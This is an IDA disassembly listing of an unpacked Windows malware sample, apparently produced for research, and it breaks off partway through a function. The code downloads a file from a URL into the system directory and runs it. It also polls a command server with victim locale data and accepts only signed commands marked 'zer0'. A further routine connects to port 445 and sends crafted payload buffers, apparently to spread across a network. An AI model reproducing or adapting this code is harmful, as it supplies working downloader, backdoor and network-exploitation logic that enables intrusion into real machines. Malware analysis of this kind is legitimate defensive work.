; ; +-------------------------------------------------------------------------+ ; | This file is generated by The Interactive Disassembler (IDA) | ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> | ; | Licensed to: SRI, 1 computer, std, 05/2007 | ; +-------------------------------------------------------------------------+ ; ; ; +-------------------------------------------------------------------------+ ; | This file is generated by The Interactive Disassembler (IDA) | ; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> | ; | Licensed to: SRI, 1 computer, std, 05/2007 | ; +-------------------------------------------------------------------------+ ; ; Input MD5 : 51AECE28BEA2705DA1151EC50A3948B8 ; File Name : u:\work\51aece28bea2705da1151ec50a3948b8_unpacked.exe ; Format : Portable executable for 80386 (PE) ; Imagebase : 31420000 ; Section 1. (virtual address 00001000) ; Virtual size : 00005000 ( 20480.) ; Section size in file : 00005000 ( 20480.) ; Offset to raw data for section: 00001000 ; Flags E0000080: Bss Executable Readable Writable ; Alignment : default unicode macro page,string,zero irpc c,<string> db '&c', page endm ifnb <zero> dw zero endif endm .686p .mmx .model flat ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute UPX0 segment para public 'CODE' use32 assume cs:UPX0 ;org 31421000h assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing dword_31421000 dd 77DD590Bh ; DATA XREF: sub_314228DB+1Ar dword_31421004 dd 77DD59F0h ; DATA XREF: sub_314228DB+38r dword_31421008 dd 77DD23D7h ; DATA XREF: sub_31422882+3Er dword_3142100C dd 77DD22EAh ; DATA XREF: sub_3142284D+14r ; sub_31422882+1Dr dword_31421010 dd 77DD5C55h ; DATA XREF: sub_3142284D+24r dword_31421014 dd 77DD189Ah ; DATA XREF: sub_3142284D+2Dr ; sub_31422882+4Er ... dword_31421018 dd 77E2A571h ; DATA XREF: sub_314223B2+17Dr dword_3142101C dd 77DE089Eh ; DATA XREF: sub_3142179A+17r dword_31421020 dd 77DE07A3h ; DATA XREF: sub_3142179A+30r dword_31421024 dd 77DE0D79h ; DATA XREF: sub_3142179A+4Dr dword_31421028 dd 77DE0343h ; DATA XREF: sub_3142179A+5Br dword_3142102C dd 77DE0AF0h ; DATA XREF: sub_3142177E+8r dword_31421030 dd 77DE042Eh ; DATA XREF: sub_3142177E+12r dword_31421034 dd 77DDEBA2h ; DATA XREF: sub_3142172F+6r dword_31421038 dd 77DE0BB2h ; DATA XREF: sub_3142172F+3Dr align 10h dword_31421040 dd 77E79E34h ; DATA XREF: sub_31422CB9+Br dword_31421044 dd 77E7980Ah ; DATA XREF: sub_31422CA5+Dr dword_31421048 dd 77E7A099h ; DATA XREF: sub_31422B67+17r dword_3142104C dd 77E76A2Eh ; DATA XREF: sub_31422B67+E9r dword_31421050 dd 77E6BD13h ; DATA XREF: sub_31422A9B+71r dword_31421054 dd 77E684C6h ; DATA XREF: sub_31422A9B+B0r dword_31421058 dd 77EBB1E7h ; DATA XREF: sub_31422D2Cr dword_3142105C dd 77EBA595h ; DATA XREF: sub_31422D26r dword_31421060 dd 77E616B4h ; DATA XREF: sub_3142292E+9Br dword_31421064 dd 77EBA6E9h ; DATA XREF: sub_31422D20r dword_31421068 dd 77E73167h ; DATA XREF: sub_31422712+13r ; sub_31422B67+8Fr dword_3142106C dd 77E737DEh ; DATA XREF: sub_314223B2+C8r dword_31421070 dd 77E79D5Bh ; DATA XREF: sub_3142239E+8r dword_31421074 dd 77E73628h ; DATA XREF: UPX0:31422346r ; sub_31422A9B+Fr dword_31421078 dd 77E79D8Ch ; DATA XREF: sub_314211A0+EDr dword_3142107C dd 77E77963h ; DATA XREF: sub_314211A0+B9r ; sub_314211A0+F6r ... dword_31421080 dd 77E7A837h ; DATA XREF: sub_314211A0+8Fr ; sub_314221C4+57r dword_31421084 dd 77E74672h ; DATA XREF: sub_314211A0+5Ar ; sub_31421422+64r ... dword_31421088 dd 77E74155h ; DATA XREF: sub_314211A0+3Dr ; sub_31422A9B+40r dword_3142108C dd 77E704FCh ; DATA XREF: sub_314211A0+37r ; sub_31422A9B+1Br dword_31421090 dd 77E7513Ch ; DATA XREF: sub_314215C7+29r dword_31421094 dd 77E61BE6h ; DATA XREF: sub_314216A2+7Dr ; sub_31421801+16Cr ... dword_31421098 dd 77E775F1h ; DATA XREF: sub_314216A2+1r dword_3142109C dd 77E73BEFh ; DATA XREF: sub_31421801+4Fr dword_314210A0 dd 77E79C90h ; DATA XREF: sub_31421D68+4Dr dword_314210A4 dd 77E7A5FDh ; DATA XREF: sub_31421D68+13r ; sub_31421DF0+2Cr dword_314210A8 dd 77E805D8h ; DATA XREF: sub_31421D68+Dr ; sub_314223B2+116r dword_314210AC dd 77E61A90h ; DATA XREF: sub_31421DF0+BCr dword_314210B0 dd 77E706B7h ; DATA XREF: sub_31421DF0+8Ar ; sub_3142292E+92r dword_314210B4 dd 77E79F93h ; DATA XREF: sub_31421DF0+26r ; UPX0:31422336r dword_314210B8 dd 77E7751Ah ; DATA XREF: sub_31421EFB+12r dword_314210BC dd 77E7C2C4h ; DATA XREF: sub_31421F29+8r dword_314210C0 dd 77E7AC37h ; DATA XREF: sub_31421F38+12r ; sub_31421F52+12r dword_314210C4 dd 77E61BB8h ; DATA XREF: sub_31421FA3+38r dword_314210C8 dd 77E74A3Bh ; DATA XREF: sub_3142204E+13r dword_314210CC dd 77E73AB3h ; DATA XREF: sub_3142204E+8r dword_314210D0 dd 77E73C49h ; DATA XREF: sub_3142207E+137r ; sub_314221C4+66r ... dword_314210D4 dd 77E777EFh ; DATA XREF: sub_3142207E+F4r ; sub_314225C3+3Fr ... dword_314210D8 dd 77E78B82h ; DATA XREF: sub_314221C4+92r dword_314210DC dd 77E793EFh ; DATA XREF: sub_314221C4+6Er dword_314210E0 dd 77E75CB5h ; DATA XREF: UPX0:31422370r ; sub_31422A9B+C3r dword_314210E4 dd 77F5157Dh, 0 ; DATA XREF: UPX0:31422361r dword_314210EC dd 77C35280h ; DATA XREF: sub_31421EFB+22r dword_314210F0 dd 77C42E10h ; DATA XREF: sub_31422CE2r dword_314210F4 dd 77C43710h ; DATA XREF: sub_31422CDCr dword_314210F8 dd 77C43490h ; DATA XREF: sub_31422CD6r dword_314210FC dd 77C3528Dh ; DATA XREF: sub_314216A2:loc_314216FCr ; sub_31421F73:loc_31421F84r ... ; --------------------------------------------------------------------------- loc_31421100: ; DATA XREF: UPX0:loc_31422CD0r mov al, 3Eh retn ; --------------------------------------------------------------------------- db 77h dword_31421104 dd 77C43AB0h ; DATA XREF: sub_31421422+3Cr ; sub_3142207E:loc_314220AFr ... dword_31421108 dd 77C43500h ; DATA XREF: sub_31421316+37r ; sub_31421422+AAr align 10h dword_31421110 dd 77D4BDCAh ; DATA XREF: sub_31421DF0+5Dr dword_31421114 dd 77D4456Bh ; DATA XREF: sub_31421DF0+67r dword_31421118 dd 77D45CBCh ; DATA XREF: sub_31421DF0+7Ar dword_3142111C dd 77D4C96Ah ; DATA XREF: sub_314215C7+5Dr ; sub_314215C7+77r ... dd 0 dword_31421124 dd 76214750h ; DATA XREF: sub_314211A0+A9r ; sub_314215C7+9Dr dword_31421128 dd 7620AFB6h ; DATA XREF: sub_314211A0+18r ; sub_314215C7+89r dword_3142112C dd 76204E4Dh ; DATA XREF: sub_314215C7+C5r dword_31421130 dd 762211EFh ; DATA XREF: sub_31422038+8r ; UPX0:314227A2r dword_31421134 dd 7620BD61h ; DATA XREF: sub_314211A0+DBr ; sub_314215C7+B0r dd 0 dword_3142113C dd 71AB41DAh ; DATA XREF: sub_31422308+10r dword_31421140 dd 71AB3ECEh ; DATA XREF: sub_314221C4+100r dword_31421144 dd 71AB5DE2h ; DATA XREF: sub_314221C4+10Dr dword_31421148 dd 71AB868Dh ; DATA XREF: sub_314221C4+120r dword_3142114C dd 71AB32CAh ; DATA XREF: sub_31421FF9+Cr dword_31421150 dd 71AB1740h ; DATA XREF: sub_31421FF9+17r dword_31421154 dd 71AB2BBFh ; DATA XREF: sub_31421FF9+25r dword_31421158 dd 71AB3C22h ; DATA XREF: sub_31421801+2Br ; sub_314221C4+ACr dword_3142115C dd 71AB401Ch ; DATA XREF: sub_31421801+44r ; sub_31422712+Dr dword_31421160 dd 71AB1746h ; DATA XREF: sub_31421801+147r ; sub_314221C4+F0r dword_31421164 dd 71AB3E5Dh ; DATA XREF: sub_31421801+15Dr dword_31421168 dd 71AB1AF4h ; DATA XREF: sub_31421801+17Br ; sub_3142207E+67r ... dword_3142116C dd 71AB5690h ; DATA XREF: sub_31421801+1A4r ; sub_31421801+1D8r ... dword_31421170 dd 71AB8629h ; DATA XREF: sub_31421801+550r ; sub_3142207E+128r dword_31421174 dd 71AB1A6Dh ; DATA XREF: sub_31421801+559r ; sub_3142207E+12Fr align 10h dword_31421180 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_31421422+5o dd offset nullsub_1 align 10h dword_31421190 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_314223B2+5o dd offset nullsub_2 align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314211A0 proc near ; CODE XREF: sub_31421422+16Dp var_110 = byte ptr -110h var_C = byte ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 110h push ebx push esi xor esi, esi push edi push esi push esi push esi push 1 push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"... call dword_31421128 ; InternetOpenA mov ebx, eax cmp ebx, esi jnz short loc_314211CB push 1 jmp loc_31421261 ; --------------------------------------------------------------------------- loc_314211CB: ; CODE XREF: sub_314211A0+22j lea eax, [ebp+var_110] push 104h push eax call dword_3142108C ; GetSystemDirectoryA mov edi, dword_31421088 lea eax, [ebp+var_110] push offset dword_314241F8 push eax call edi ; lstrcat lea eax, [ebp+var_110] push 6 push eax call dword_31421084 ; lstrlen lea eax, [ebp+eax+var_110] push eax call sub_31421F73 pop ecx lea eax, [ebp+var_110] pop ecx push offset dword_314241F0 push eax call edi ; lstrcat push esi push esi push 2 push esi push esi lea eax, [ebp+var_110] push 40000000h push eax call dword_31421080 ; CreateFileA cmp eax, 0FFFFFFFFh mov [ebp+var_4], eax jnz short loc_31421241 push 2 jmp short loc_31421261 ; --------------------------------------------------------------------------- loc_31421241: ; CODE XREF: sub_314211A0+9Bj push esi push esi push esi push esi push [ebp+arg_0] push ebx call dword_31421124 ; InternetOpenUrlA cmp eax, esi mov [ebp+arg_0], eax jnz short loc_31421264 push [ebp+var_4] call dword_3142107C ; CloseHandle push 3 loc_31421261: ; CODE XREF: sub_314211A0+26j ; sub_314211A0+9Fj pop eax jmp short loc_314212B5 ; --------------------------------------------------------------------------- loc_31421264: ; CODE XREF: sub_314211A0+B4j mov edi, 100000h push edi call sub_31422CA5 mov ebx, eax pop ecx lea eax, [ebp+var_8] push eax push edi push ebx push [ebp+arg_0] call dword_31421134 ; InternetReadFile lea eax, [ebp+var_C] push esi push eax push [ebp+var_8] push ebx push [ebp+var_4] call dword_31421078 ; WriteFile push [ebp+var_4] call dword_3142107C ; CloseHandle lea eax, [ebp+var_110] push 5 push eax call sub_31421FA3 push ebx call sub_31422CB9 add esp, 0Ch xor eax, eax loc_314212B5: ; CODE XREF: sub_314211A0+C2j pop edi pop esi pop ebx leave retn sub_314211A0 endp ; =============== S U B R O U T I N E ======================================= sub_314212BA proc near ; CODE XREF: sub_31421422+F8p arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = byte ptr 0Ch mov ecx, [esp+arg_4] mov eax, [esp+arg_0] push ebx push esi push edi or edi, 0FFFFFFFFh inc eax push 0Fh lea esi, [ecx+1] sub edi, ecx pop ecx loc_314212D1: ; CODE XREF: sub_314212BA+56j mov dl, [eax] mov bl, [eax-1] add edx, ecx add bl, cl sar edx, 4 and dl, 3 sub dl, [esp+0Ch+arg_8] shl bl, 2 or dl, bl mov [esi-1], dl mov dl, [eax+1] mov bl, [eax] dec dl add bl, cl and dl, cl sub dl, [esp+0Ch+arg_8] add eax, 3 shl bl, 4 and bl, 0F0h or dl, bl mov [esi], dl inc esi inc esi lea edx, [edi+esi] cmp edx, 30h jl short loc_314212D1 pop edi pop esi pop ebx retn sub_314212BA endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421316 proc near ; CODE XREF: sub_3142139B+27p var_38 = byte ptr -38h var_1C = byte ptr -1Ch arg_0 = byte ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 38h push ebx push esi push edi push 6 pop ecx mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ" lea edi, [ebp+var_1C] push 6 rep movsd movsw movsb pop ecx mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz" lea edi, [ebp+var_38] mov ebx, [ebp+arg_4] rep movsd movsw test ebx, ebx movsb jge short loc_31421349 add ebx, 1Ah loc_31421349: ; CODE XREF: sub_31421316+2Ej movsx edi, [ebp+arg_0] mov esi, dword_31421108 lea eax, [ebp+var_1C] push edi push eax call esi ; strchr pop ecx test eax, eax pop ecx jz short loc_31421373 lea ecx, [ebp+var_1C] push 1Ah sub eax, ecx pop ecx add eax, ebx cdq idiv ecx mov al, [ebp+edx+var_1C] jmp short loc_31421396 ; --------------------------------------------------------------------------- loc_31421373: ; CODE XREF: sub_31421316+48j lea eax, [ebp+var_38] push edi push eax call esi ; strchr pop ecx test eax, eax pop ecx jz short loc_31421393 lea ecx, [ebp+var_38] push 1Ah sub eax, ecx pop ecx add eax, ebx cdq idiv ecx mov al, [ebp+edx+var_38] jmp short loc_31421396 ; --------------------------------------------------------------------------- loc_31421393: ; CODE XREF: sub_31421316+68j mov al, [ebp+arg_0] loc_31421396: ; CODE XREF: sub_31421316+5Bj ; sub_31421316+7Bj pop edi pop esi pop ebx leave retn sub_31421316 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3142139B proc near ; CODE XREF: sub_31421422+D6p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp mov eax, [ebp+arg_4] push esi mov esi, [ebp+arg_8] push edi mov al, [eax] test al, al jz short loc_314213F8 mov edi, [ebp+arg_0] push ebx loc_314213B0: ; CODE XREF: sub_3142139B+58j sub al, 2 inc [ebp+arg_4] mov bl, al mov eax, esi neg eax mov byte ptr [ebp+arg_0], bl push eax push [ebp+arg_0] call sub_31421316 mov [edi], al pop ecx inc edi cmp bl, 61h pop ecx jl short loc_314213DC cmp bl, 7Ah jg short loc_314213DC movsx esi, bl sub esi, 61h loc_314213DC: ; CODE XREF: sub_3142139B+34j ; sub_3142139B+39j cmp bl, 41h jl short loc_314213EC cmp bl, 5Ah jg short loc_314213EC movsx esi, bl sub esi, 41h loc_314213EC: ; CODE XREF: sub_3142139B+44j ; sub_3142139B+49j mov eax, [ebp+arg_4] mov al, [eax] test al, al jnz short loc_314213B0 pop ebx jmp short loc_314213FB ; --------------------------------------------------------------------------- loc_314213F8: ; CODE XREF: sub_3142139B+Fj mov edi, [ebp+arg_0] loc_314213FB: ; CODE XREF: sub_3142139B+5Bj and byte ptr [edi], 0 pop edi pop esi pop ebp retn sub_3142139B endp ; =============== S U B R O U T I N E ======================================= sub_31421402 proc near ; CODE XREF: sub_31421422+104p arg_0 = dword ptr 4 xor eax, eax xor ecx, ecx loc_31421406: ; CODE XREF: sub_31421402+12j mov edx, [esp+arg_0] movzx edx, byte ptr [ecx+edx] add eax, edx inc ecx cmp ecx, 30h jl short loc_31421406 push 1Ah cdq pop ecx idiv ecx mov eax, edx add eax, 61h retn sub_31421402 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421422 proc near ; CODE XREF: sub_314215C7+BAp var_174 = dword ptr -174h var_170 = byte ptr -170h var_168 = byte ptr -168h var_164 = byte ptr -164h var_134 = dword ptr -134h var_130 = dword ptr -130h var_12C = dword ptr -12Ch var_128 = dword ptr -128h var_124 = byte ptr -124h var_11C = byte ptr -11Ch var_1C = dword ptr -1Ch var_10 = dword ptr -10h var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp push 0FFFFFFFFh push offset dword_31421180 push offset loc_31422CD0 mov eax, large fs:0 push eax mov large fs:0, esp sub esp, 164h push ebx push esi push edi mov [ebp+var_128], 1 and [ebp+var_4], 0 push offset aZer0 ; "zer0" push [ebp+arg_0] call dword_31421104 ; strstr pop ecx pop ecx mov edi, eax mov [ebp+var_130], edi test edi, edi jz loc_314215A8 add edi, 4 mov [ebp+var_130], edi jz loc_314215A8 push edi call dword_31421084 ; lstrlen mov [ebp+var_1C], eax cmp eax, 50h jle loc_314215A8 and byte ptr [edi+100h], 0 mov al, [edi] mov [ebp+var_168], al movsx ebx, al sub ebx, 61h mov [ebp+var_12C], ebx js loc_314215A8 cmp ebx, 1Ah jge loc_314215A8 inc edi mov [ebp+var_130], edi push 7Eh push edi call dword_31421108 ; strchr pop ecx pop ecx mov esi, eax mov [ebp+var_134], esi test esi, esi jz loc_314215A8 mov al, [esi] mov [ebp+var_170], al and byte ptr [esi], 0 push ebx push edi lea eax, [ebp+var_11C] push eax call sub_3142139B mov al, [ebp+var_170] mov [esi], al inc esi mov [ebp+var_130], esi xor edi, edi push edi lea eax, [ebp+var_164] push eax lea eax, [esi+1] push eax call sub_314212BA lea eax, [ebp+var_164] push eax call sub_31421402 add esp, 1Ch cmp [esi], al jnz short loc_314215A8 push 44h push offset dword_31424000 lea eax, [ebp+var_124] push eax call sub_3142172F add esp, 0Ch lea eax, [ebp+var_174] push eax push 30h lea eax, [ebp+var_164] push eax lea eax, [ebp+var_11C] push eax call dword_31421084 ; lstrlen push eax lea eax, [ebp+var_11C] push eax lea eax, [ebp+var_124] push eax call sub_3142179A add esp, 18h test eax, eax jnz short loc_3142159B cmp [ebp+var_174], edi jz short loc_3142159B lea eax, [ebp+var_11C] push eax call sub_314211A0 pop ecx mov [ebp+var_128], edi loc_3142159B: ; CODE XREF: sub_31421422+15Cj ; sub_31421422+164j lea eax, [ebp+var_124] push eax call sub_3142177E pop ecx loc_314215A8: ; CODE XREF: sub_31421422+4Ej ; sub_31421422+5Dj ... or [ebp+var_4], 0FFFFFFFFh call nullsub_1 mov eax, [ebp+var_128] mov ecx, [ebp+var_10] mov large fs:0, ecx pop edi pop esi pop ebx leave retn sub_31421422 endp ; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND] ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_314215C7 proc near ; CODE XREF: sub_314216A2+2Ap var_E8 = byte ptr -0E8h var_84 = byte ptr -84h var_4 = byte ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 0E8h push ebx push esi push edi push 4000h call sub_31422CA5 pop ecx mov esi, eax lea eax, [ebp+var_E8] push 63h push eax push 7 push 400h call dword_31421090 ; GetLocaleInfoA xor ebx, ebx cmp byte ptr [ebp+arg_4], bl jz short loc_3142162F lea eax, [ebp+var_E8] push eax lea eax, [ebp+var_84] push dword_31424FEC push dword_31425004 push offset aYfhvczaxyr ; "yfhvczaxyr" push [ebp+arg_0] push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"... push eax call dword_3142111C ; wsprintfA add esp, 1Ch jmp short loc_31421647 ; --------------------------------------------------------------------------- loc_3142162F: ; CODE XREF: sub_314215C7+34j push [ebp+arg_0] lea eax, [ebp+var_84] push offset aHttpS ; "http://%s" push eax call dword_3142111C ; wsprintfA add esp, 0Ch loc_31421647: ; CODE XREF: sub_314215C7+66j push ebx push ebx push ebx push ebx push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"... call dword_31421128 ; InternetOpenA push ebx mov edi, eax push ebx push ebx lea eax, [ebp+var_84] push ebx push eax push edi call dword_31421124 ; InternetOpenUrlA mov ebx, eax lea eax, [ebp+var_4] push eax push 2000h push esi push ebx call dword_31421134 ; InternetReadFile push esi mov [ebp+arg_4], eax call sub_31421422 push esi call sub_31422CB9 mov esi, dword_3142112C pop ecx pop ecx push ebx call esi ; InternetCloseHandle push edi call esi ; InternetCloseHandle mov eax, [ebp+arg_4] pop edi pop esi pop ebx leave retn sub_314215C7 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: noreturn sub_314216A2 proc near ; DATA XREF: sub_314223B2+15Bo push ebx mov ebx, dword_31421098 push esi push edi loc_314216AB: ; CODE XREF: sub_314216A2+88j xor esi, esi mov edi, 46021h loc_314216B2: ; CODE XREF: sub_314216A2+86j inc esi inc esi call sub_31422038 test eax, eax jz short loc_314216FC mov al, byte_31424080[esi+esi*4] push eax push off_31424081[esi+esi*4] call sub_314215C7 or eax, edi pop ecx xor eax, 8064h pop ecx shl eax, 3 mov edi, eax xor eax, 228h test ax, 0FFFFh jnz short loc_314216FC push 0 push offset dword_31425004 call ebx ; InterlockedExchange push 0 push offset dword_31424FEC call ebx ; InterlockedExchange loc_314216FC: ; CODE XREF: sub_314216A2+19j ; sub_314216A2+46j call dword_314210FC ; rand push 3 cdq pop ecx idiv ecx add esi, edx call sub_31422068 xor edx, edx mov ecx, 493E0h div ecx add edx, 61B48h push edx call dword_31421094 ; Sleep cmp esi, 16h jb short loc_314216B2 jmp loc_314216AB sub_314216A2 endp ; =============== S U B R O U T I N E ======================================= sub_3142172F proc near ; CODE XREF: sub_31421422+11Ep arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch push ebx mov ebx, [esp+4+arg_0] push esi mov esi, dword_31421034 push edi xor edi, edi push edi push 1 push edi push edi push ebx call esi ; CryptAcquireContextA test eax, eax jnz short loc_3142175C push 8 push 1 push edi push edi push ebx call esi ; CryptAcquireContextA test eax, eax jnz short loc_3142175C push 1 pop eax jmp short loc_3142177A ; --------------------------------------------------------------------------- loc_3142175C: ; CODE XREF: sub_3142172F+19j ; sub_3142172F+26j lea eax, [ebx+4] push eax push edi push edi push [esp+18h+arg_8] push [esp+1Ch+arg_4] push dword ptr [ebx] call dword_31421038 ; CryptImportKey neg eax sbb eax, eax and al, 0FEh inc eax inc eax loc_3142177A: ; CODE XREF: sub_3142172F+2Bj pop edi pop esi pop ebx retn sub_3142172F endp ; =============== S U B R O U T I N E ======================================= sub_3142177E proc near ; CODE XREF: sub_31421422+180p arg_0 = dword ptr 4 push esi mov esi, [esp+4+arg_0] push dword ptr [esi+4] call dword_3142102C ; CryptDestroyKey push 0 push dword ptr [esi] call dword_31421030 ; CryptReleaseContext xor eax, eax pop esi retn sub_3142177E endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_3142179A proc near ; CODE XREF: sub_31421422+152p arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h arg_14 = dword ptr 1Ch push ebp mov ebp, esp push esi mov esi, [ebp+arg_0] push edi lea eax, [ebp+arg_0] xor edi, edi push eax push edi push edi push 8003h push dword ptr [esi] call dword_3142101C ; CryptCreateHash test eax, eax jnz short loc_314217C0 push 1 pop eax jmp short loc_314217FD ; --------------------------------------------------------------------------- loc_314217C0: ; CODE XREF: sub_3142179A+1Fj push edi push [ebp+arg_8] push [ebp+arg_4] push [ebp+arg_0] call dword_31421020 ; CryptHashData test eax, eax jnz short loc_314217D9 push 2 pop edi jmp short loc_314217F2 ; --------------------------------------------------------------------------- loc_314217D9: ; CODE XREF: sub_3142179A+38j push edi push edi push dword ptr [esi+4] push [ebp+arg_10] push [ebp+arg_C] push [ebp+arg_0] call dword_31421024 ; CryptVerifySignatureA mov ecx, [ebp+arg_14] mov [ecx], eax loc_314217F2: ; CODE XREF: sub_3142179A+3Dj push [ebp+arg_0] call dword_31421028 ; CryptDestroyHash mov eax, edi loc_314217FD: ; CODE XREF: sub_3142179A+24j pop edi pop esi pop ebp retn sub_3142179A endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_31421801 proc near ; CODE XREF: sub_3142255F+36p ; sub_314225C3+48p ... var_89E4 = byte ptr -89E4h var_897C = byte ptr -897Ch var_690C = byte ptr -690Ch var_689C = byte ptr -689Ch var_5DD8 = byte ptr -5DD8h var_4834 = byte ptr -4834h var_4833 = byte ptr -4833h var_37A0 = byte ptr -37A0h var_2CDC = byte ptr -2CDCh var_2CDB = byte ptr -2CDBh var_2CD8 = byte ptr -2CD8h var_24F4 = byte ptr -24F4h var_24E4 = byte ptr -24E4h var_21C0 = byte ptr -21C0h var_21BC = byte ptr -21BCh var_21B0 = byte ptr -21B0h var_1F28 = byte ptr -1F28h var_1EAC = byte ptr -1EACh var_16DC = byte ptr -16DCh var_1231 = byte ptr -1231h var_F44 = byte ptr -0F44h var_EA4 = byte ptr -0EA4h var_798 = dword ptr -798h var_788 = byte ptr -788h var_774 = byte ptr -774h var_730 = byte ptr -730h var_134 = byte ptr -134h var_133 = byte ptr -133h var_E4 = byte ptr -0E4h var_E1 = byte ptr -0E1h var_B7 = byte ptr -0B7h var_B5 = byte ptr -0B5h var_B4 = byte ptr -0B4h var_6C = byte ptr -6Ch var_4C = byte ptr -4Ch var_24 = word ptr -24h var_22 = word ptr -22h var_20 = dword ptr -20h var_14 = dword ptr -14h var_10 = dword ptr -10h var_C = dword ptr -0Ch var_6 = byte ptr -6 var_5 = byte ptr -5 var_4 = dword ptr -4 arg_0 = dword ptr 8 push ebp mov ebp, esp mov eax, 89E4h call sub_31422CF0 mov eax, dword_31424C84 push ebx push edi push 1 pop edi xor ebx, ebx mov [ebp+var_14], eax mov eax, dword_31424C88 push ebx push edi push 2 mov [ebp+var_10], eax mov [ebp+var_C], edi call dword_31421158 ; socket cmp eax, 0FFFFFFFFh mov [ebp+var_4], eax jz loc_31421D61 push esi mov esi, [ebp+arg_0] push 1Dh push esi call dword_3142115C ; inet_ntoa push eax lea eax, [ebp+var_6C] push eax call dword_3142109C ; lstrcpyn lea eax, [ebp+var_6C] push eax lea eax, [ebp+var_4C] push offset loc_31424C78 push eax call dword_3142111C ; wsprintfA add esp, 0Ch xor ecx, ecx lea eax, [ebp+var_133] loc_31421874: ; CODE XREF: sub_31421801+83j mov dl, [ebp+ecx+var_4C] mov [eax-1], dl and byte ptr [eax], 0 inc ecx inc eax inc eax cmp ecx, 28h jl short loc_31421874 push 60h lea eax, [ebp+var_E4] push offset dword_31424798 push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_4C] push eax call sub_31422CDC ; strlen shl eax, 1 push eax lea eax, [ebp+var_134] push eax lea eax, [ebp+var_B4] push eax call sub_31422CE2 ; memcpy add esp, 1Ch lea eax, [ebp+var_4C] push 9 push (offset aC+3) push eax call sub_31422CDC ; strlen pop ecx lea eax, [ebp+eax*2+var_B5] push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_4C] push eax call sub_31422CDC ; strlen add al, 1Ah push edi shl al, 1 mov [ebp+var_5], al lea eax, [ebp+var_5] push eax lea eax, [ebp+var_E1] push eax call sub_31422CE2 ; memcpy lea eax, [ebp+var_4C] push eax call sub_31422CDC ; strlen shl al, 1 add al, 9 push edi mov [ebp+var_6], al lea eax, [ebp+var_6] push eax lea eax, [ebp+var_B7] push eax call sub_31422CE2 ; memcpy push 0E29h lea eax, [ebp+var_1F28] push 31h push eax call sub_31422CD6 ; memset push 10h lea eax, [ebp+var_24] push ebx push eax call sub_31422CD6 ; memset add esp, 44h mov [ebp+var_24], 2 push 1BDh call dword_31421160 ; htons mov [ebp+var_22], ax lea eax, [ebp+var_24] push 10h push eax push [ebp+var_4] mov [ebp+var_20], esi call dword_31421164 ; connect cmp eax, 0FFFFFFFFh jz loc_31421D57 mov esi, dword_31421094 mov edi, 0C8h push edi call esi ; Sleep push ebx mov ebx, dword_31421168 push 89h push offset dword_31424580 push [ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C push 0 push 0A8h push offset dword_3142460C push [ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C push 0 push 0DEh push offset dword_314246B8 push [ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C cmp eax, 46h jl loc_31421D4C cmp [ebp+var_730], 31h jnz loc_31421BF7 and [ebp+arg_0], 0 push 7D0h lea eax, [ebp+var_F44] push 90h push eax call sub_31422CD6 ; memset add esp, 0Ch push offset byte_314242B8 call dword_31421084 ; lstrlen push eax lea eax, [ebp+var_EA4] push offset byte_314242B8 push eax call sub_31422CE2 ; memcpy add esp, 0Ch lea eax, [ebp+var_14] push eax call dword_31421084 ; lstrlen push eax lea eax, [ebp+var_14] push eax lea eax, [ebp+var_788] push eax call sub_31422CE2 ; memcpy mov eax, dword_31424BBE add esp, 0Ch mov [ebp+var_798], eax loc_31421A98: ; CODE XREF: sub_31421801+4E1j movsx eax, [ebp+var_5] add eax, 4 push 0 push eax lea eax, [ebp+var_E4] push eax push [ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push [ebp+var_4] call dword_3142116C ; recv cmp eax, 0FFFFFFFFh jz loc_31421D4C push 0 push 68h push offset dword_314247FC push [ebp+var_4] call ebx ; send push edi call esi ; Sleep push 0 lea eax, [ebp+var_774] push 640h push eax push 